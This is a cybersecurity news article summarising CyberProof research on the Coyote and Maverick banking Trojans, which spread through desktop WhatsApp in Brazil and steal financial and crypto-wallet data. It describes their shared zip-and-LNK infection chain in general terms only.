In recent months, multiple threat campaigns have enabled several banking Trojans to infiltrate systems across Brazil, resulting in a growing number of victims. 

CyberProof researchers published an updated report this week examining two malware variants, Coyote and Maverick, which have persistently attacked Brazilian citizens over the past year. CyberProof initially documented Coyote in February, outlining how it exploits desktop WhatsApp to capture victims’ financial and crypto-wallet information. 

The research blog details how CyberProof analysts identified notable overlaps between Coyote and several recently uncovered banking Trojans, including Maverick (reported by Kaspersky and BlueVoyant), Sorvepotel (investigated by Trend Micro), and a separate WhatsApp worm documented by Sophos last month. 

Data from Sophos shows that Brazil accounted for almost every confirmed infection. Researchers documented upwards of 450 incidents, primarily within the public sector, alongside additional cases across manufacturing, tech, education, and construction. 

The attacks consistently aimed at Brazilian desktop WhatsApp users, capturing banking details and replicating through affected users’ contact lists. Though financial malware has long been a familiar threat, and related campaigns have been detected before, CyberProof’s research illustrates the significant risks posed by focused, region-based cyber campaigns. 

Coyotes & Mavericks  

Since publishing their findings in February, CyberProof researchers have encountered Coyote alongside several comparable threats. This ongoing work has revealed notable commonalities between Coyote and the extensively documented Maverick strain. 

Beyond the noted parallels, both malware strains rely on a similar distribution tactic in which targets receive a zip attachment—frequently sent by an infected contact—along with prompts to open the embedded LNK file on a desktop. Once opened, the LNK executes PowerShell scripts that launch a multistage attack chain. 

The attack chain includes establishing communication with a C2 server, downloading the secondary payload, and collecting financial and crypto-wallet information. Despite some observed differences, CyberProof found that both malware families are developed in .NET and share similar code for tracking banking application activity. 

Past incidents involving Maverick showed it affecting users associated with financial institutions, hospitality businesses, and desktop WhatsApp users drawn in through its replication mechanism. Coyote seems to impact a similarly aligned group.